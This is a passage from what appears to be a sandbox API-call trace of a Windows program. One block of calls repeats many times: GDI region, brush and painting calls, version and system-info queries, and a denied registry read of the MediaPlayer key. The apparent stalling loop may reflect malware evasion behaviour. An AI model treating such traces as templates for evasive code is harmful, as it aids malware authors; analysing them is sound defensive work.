hrgnSrc1=0x2a0401d9, hrgnSrc2=0x280401dc, iMode=4) returned 2 [0087.530] CreateSolidBrush (color=0xff) returned 0x61006a5 [0087.530] CreateSolidBrush (color=0xff0000) returned 0x910069e [0087.530] DeleteObject (ho=0x910069e) returned 1 [0087.530] DeleteObject (ho=0x280401dc) returned 1 [0087.530] DeleteObject (ho=0x2a0401d9) returned 1 [0087.530] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.530] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.530] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.530] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.530] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.530] BeginPath (hdc=0x0) returned 0 [0087.530] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.530] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.530] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.530] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.530] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.530] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.531] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.531] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.531] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x290401dc [0087.531] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b0401d9 [0087.531] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x504069f [0087.531] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x90406a0 [0087.531] CombineRgn (hrgnDst=0x504069f, hrgnSrc1=0x290401dc, hrgnSrc2=0x2b0401d9, iMode=1) returned 1 [0087.531] CombineRgn (hrgnDst=0x90406a0, hrgnSrc1=0x290401dc, hrgnSrc2=0x2b0401d9, iMode=4) returned 2 [0087.531] CreateSolidBrush (color=0xff) returned 0xa10069e [0087.531] CreateSolidBrush (color=0xff0000) returned 0x51006a1 [0087.531] DeleteObject (ho=0x51006a1) returned 1 [0087.531] DeleteObject (ho=0x2b0401d9) returned 1 [0087.531] DeleteObject (ho=0x290401dc) returned 1 [0087.531] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.531] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.531] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.531] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.531] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.531] BeginPath (hdc=0x0) returned 0 [0087.531] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.531] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.531] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.531] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.531] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.531] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.531] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.531] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.531] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c0401d9 [0087.531] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a0401dc [0087.531] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x70406ac [0087.531] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406ad [0087.531] CombineRgn (hrgnDst=0x70406ac, hrgnSrc1=0x2c0401d9, hrgnSrc2=0x2a0401dc, iMode=1) returned 1 [0087.531] CombineRgn (hrgnDst=0x30406ad, hrgnSrc1=0x2c0401d9, hrgnSrc2=0x2a0401dc, iMode=4) returned 2 [0087.531] CreateSolidBrush (color=0xff) returned 0x61006a1 [0087.531] CreateSolidBrush (color=0xff0000) returned 0x51006b8 [0087.531] DeleteObject (ho=0x51006b8) returned 1 [0087.532] DeleteObject (ho=0x2a0401dc) returned 1 [0087.532] DeleteObject (ho=0x2c0401d9) returned 1 [0087.532] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.532] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.532] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.532] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.532] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.532] BeginPath (hdc=0x0) returned 0 [0087.532] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.532] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.532] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.532] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.532] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.532] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.532] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b0401dc [0087.532] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d0401d9 [0087.532] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406b9 [0087.532] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406c2 [0087.532] CombineRgn (hrgnDst=0x30406b9, hrgnSrc1=0x2b0401dc, hrgnSrc2=0x2d0401d9, iMode=1) returned 1 [0087.532] CombineRgn (hrgnDst=0x50406c2, hrgnSrc1=0x2b0401dc, hrgnSrc2=0x2d0401d9, iMode=4) returned 2 [0087.532] CreateSolidBrush (color=0xff) returned 0x61006b8 [0087.532] CreateSolidBrush (color=0xff0000) returned 0x31006c3 [0087.532] DeleteObject (ho=0x31006c3) returned 1 [0087.532] DeleteObject (ho=0x2d0401d9) returned 1 [0087.532] DeleteObject (ho=0x2b0401dc) returned 1 [0087.532] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.532] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.532] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.532] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.532] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.532] BeginPath (hdc=0x0) returned 0 [0087.532] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.532] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.532] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.532] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.532] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.532] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.532] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.533] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e0401d9 [0087.533] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c0401dc [0087.533] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406ce [0087.533] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406cf [0087.533] CombineRgn (hrgnDst=0x50406ce, hrgnSrc1=0x2e0401d9, hrgnSrc2=0x2c0401dc, iMode=1) returned 1 [0087.533] CombineRgn (hrgnDst=0x30406cf, hrgnSrc1=0x2e0401d9, hrgnSrc2=0x2c0401dc, iMode=4) returned 2 [0087.533] CreateSolidBrush (color=0xff) returned 0x41006c3 [0087.533] CreateSolidBrush (color=0xff0000) returned 0x51006de [0087.533] DeleteObject (ho=0x51006de) returned 1 [0087.533] DeleteObject (ho=0x2c0401dc) returned 1 [0087.533] DeleteObject (ho=0x2e0401d9) returned 1 [0087.533] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.533] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.533] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.533] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.533] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.533] BeginPath (hdc=0x0) returned 0 [0087.533] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.533] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.533] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.533] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.533] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.533] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.533] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.533] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.533] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d0401dc [0087.533] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f0401d9 [0087.533] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406df [0087.533] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406ae [0087.533] CombineRgn (hrgnDst=0x30406df, hrgnSrc1=0x2d0401dc, hrgnSrc2=0x2f0401d9, iMode=1) returned 1 [0087.533] CombineRgn (hrgnDst=0x50406ae, hrgnSrc1=0x2d0401dc, hrgnSrc2=0x2f0401d9, iMode=4) returned 2 [0087.533] CreateSolidBrush (color=0xff) returned 0x61006de [0087.533] CreateSolidBrush (color=0xff0000) returned 0x31006af [0087.533] DeleteObject (ho=0x31006af) returned 1 [0087.533] DeleteObject (ho=0x2f0401d9) returned 1 [0087.533] DeleteObject (ho=0x2d0401dc) returned 1 [0087.533] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.533] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.534] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.534] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.534] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.534] BeginPath (hdc=0x0) returned 0 [0087.534] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.534] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.534] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.534] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.534] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.534] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.534] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.534] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x300401d9 [0087.534] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e0401dc [0087.534] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406b0 [0087.534] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406b1 [0087.534] CombineRgn (hrgnDst=0x50406b0, hrgnSrc1=0x300401d9, hrgnSrc2=0x2e0401dc, iMode=1) returned 1 [0087.534] CombineRgn (hrgnDst=0x30406b1, hrgnSrc1=0x300401d9, hrgnSrc2=0x2e0401dc, iMode=4) returned 2 [0087.534] CreateSolidBrush (color=0xff) returned 0x41006af [0087.534] CreateSolidBrush (color=0xff0000) returned 0x51006b4 [0087.534] DeleteObject (ho=0x51006b4) returned 1 [0087.534] DeleteObject (ho=0x2e0401dc) returned 1 [0087.534] DeleteObject (ho=0x300401d9) returned 1 [0087.534] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.534] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.534] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.534] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.534] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.534] BeginPath (hdc=0x0) returned 0 [0087.534] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.534] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.534] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.534] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.534] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.534] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.534] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.535] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f0401dc [0087.535] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x310401d9 [0087.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406b5 [0087.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406ba [0087.535] CombineRgn (hrgnDst=0x30406b5, hrgnSrc1=0x2f0401dc, hrgnSrc2=0x310401d9, iMode=1) returned 1 [0087.535] CombineRgn (hrgnDst=0x50406ba, hrgnSrc1=0x2f0401dc, hrgnSrc2=0x310401d9, iMode=4) returned 2 [0087.535] CreateSolidBrush (color=0xff) returned 0x61006b4 [0087.535] CreateSolidBrush (color=0xff0000) returned 0x31006bb [0087.535] DeleteObject (ho=0x31006bb) returned 1 [0087.535] DeleteObject (ho=0x310401d9) returned 1 [0087.535] DeleteObject (ho=0x2f0401dc) returned 1 [0087.535] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.535] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.535] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.535] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.535] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.535] BeginPath (hdc=0x0) returned 0 [0087.535] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.535] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.535] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.535] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.535] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.535] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.535] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.535] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x320401d9 [0087.535] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x300401dc [0087.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406bc [0087.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406bd [0087.535] CombineRgn (hrgnDst=0x50406bc, hrgnSrc1=0x320401d9, hrgnSrc2=0x300401dc, iMode=1) returned 1 [0087.535] CombineRgn (hrgnDst=0x30406bd, hrgnSrc1=0x320401d9, hrgnSrc2=0x300401dc, iMode=4) returned 2 [0087.535] CreateSolidBrush (color=0xff) returned 0x41006bb [0087.535] CreateSolidBrush (color=0xff0000) returned 0x51006c0 [0087.535] DeleteObject (ho=0x51006c0) returned 1 [0087.535] DeleteObject (ho=0x300401dc) returned 1 [0087.535] DeleteObject (ho=0x320401d9) returned 1 [0087.535] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.535] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.535] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.535] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.535] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.535] BeginPath (hdc=0x0) returned 0 [0087.536] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.536] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.536] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.536] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.536] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.536] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.536] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.536] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.536] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x310401dc [0087.536] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x330401d9 [0087.536] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406c1 [0087.536] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406c6 [0087.536] CombineRgn (hrgnDst=0x30406c1, hrgnSrc1=0x310401dc, hrgnSrc2=0x330401d9, iMode=1) returned 1 [0087.536] CombineRgn (hrgnDst=0x50406c6, hrgnSrc1=0x310401dc, hrgnSrc2=0x330401d9, iMode=4) returned 2 [0087.536] CreateSolidBrush (color=0xff) returned 0x61006c0 [0087.536] CreateSolidBrush (color=0xff0000) returned 0x31006c7 [0087.536] DeleteObject (ho=0x31006c7) returned 1 [0087.536] DeleteObject (ho=0x330401d9) returned 1 [0087.536] DeleteObject (ho=0x310401dc) returned 1 [0087.536] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.536] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, 